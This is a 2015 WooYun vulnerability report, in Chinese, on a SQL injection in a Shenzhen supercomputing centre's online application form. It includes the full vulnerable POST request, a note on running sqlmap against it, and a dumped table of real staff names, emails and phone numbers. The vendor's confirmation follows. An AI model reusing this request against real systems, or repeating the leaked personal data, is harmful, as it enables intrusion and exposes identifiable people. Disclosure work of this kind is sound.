当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116618

漏洞标题:国家超级计算某超算中心SQL注入影响全站数据

相关厂商:国家超级计算某超算中心

漏洞作者: Hydra_Tc

提交时间:2015-05-28 09:58

修复时间:2015-07-17 09:46

公开时间:2015-07-17 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-12: 细节向核心白帽子及相关领域专家公开
2015-06-22: 细节向普通白帽子公开
2015-07-02: 细节向实习白帽子公开
2015-07-17: 细节向公众公开

简要描述:

国家超级计算某超算中心SQL注入影响全站数据

详细说明:

深圳超算中心在线申请页面存在post注入
http://www.nsccsz.gov.cn/hpc/services/apply.aspx
sqlmap注入过程中需要隔几分钟重新抓包更改验证码

POST /ajaxnet/NsccszDA.ashx HTTP/1.1
Host: www.nsccsz.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=UTF-8
X-AjaxNet-Method: SaveHpcOrder
X-Requested-With: XMLHttpRequest
Referer: http://www.nsccsz.gov.cn/hpc/services/apply.aspx
Content-Length: 321
Cookie: Hm_lvt_c261b5a38f2455f39b785d78eb203e89=1432742529; Hm_lpvt_c261b5a38f2455f39b785d78eb203e89=1432742529; Hm_lvt_c76fc7c4b1c034f612c1ef00e01a7349=1432742529; Hm_lpvt_c76fc7c4b1c034f612c1ef00e01a7349=1432742983; _gscu_359056655=32742529izryvc55; _gscs_359056655=3274252937z2h055|pv:14; _gscbrs_359056655=1; ASP.NET_SessionId=D3985C1157DA745CDC55743C
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"order":{"Domain":"科学计算、分子模拟、量子计算与气候气象业务","Type":"机时租用","Division":"GK-科学计算分区","Method":"包月","Amount":1,"Cpu":1,"Disk":1,"Vpn":1,"Softwares":"1","Other":"1","Company":"1111","Contact":"111","Mobile":"13555555555","Email":"asd@qq.com"},"checkCode":"2625"}


aaa1.jpg


aaa2.jpg


泄露大量账号密码

+-----+-----------+--------------------+----------------------+-----------------------+---------+-------------+----------+------------------+
| id  | parent_id | tel                | name                 | email                 | remark  | mobile      | contacts | enterprise       |
+-----+-----------+--------------------+----------------------+-----------------------+---------+-------------+----------+------------------+
| 1   | 0         | NULL               | root                 | NULL                  | NULL    | NULL        | NULL     | 根                |
| 56  | 0         | 86576053           | nsccsz               | lipu@nsccsz.gov.cn    | <blank> | 18927492705 | 李璞       | 超算中心             |
| 57  | 0         | 86576053           | szsti                | lipu@nsccsz.gov.cn    | <blank> | 18927492705 | 李璞       | 科技创新委            |
| 58  | 56        | 86576053           | nsccszpersonal       | lipu@nsccsz.gov.cn    | <blank> | 18927492705 | 李璞       | 超算中心个人用户         |
| 61  | 0         | <blank>            | text                 | vteipdx@qq.com        | NULL    | <blank>     | <blank>  | 1                |
| 62  | 56        | <blank>            | test                 | ds@dd.com             | <blank> | <blank>     | 李工       | test             |
| 63  | 64        | <blank>            | SoftWareparkPersonal | <blank>               | <blank> | <blank>     | 李工       | 深圳软件园云服务平台个人注册帐号 |

漏洞证明:

同上

修复方案:

过滤。

版权声明:转载请注明来源 Hydra_Tc@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-02 09:46

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:11
正在联系相关网站管理单位处置。

最新状态:

暂无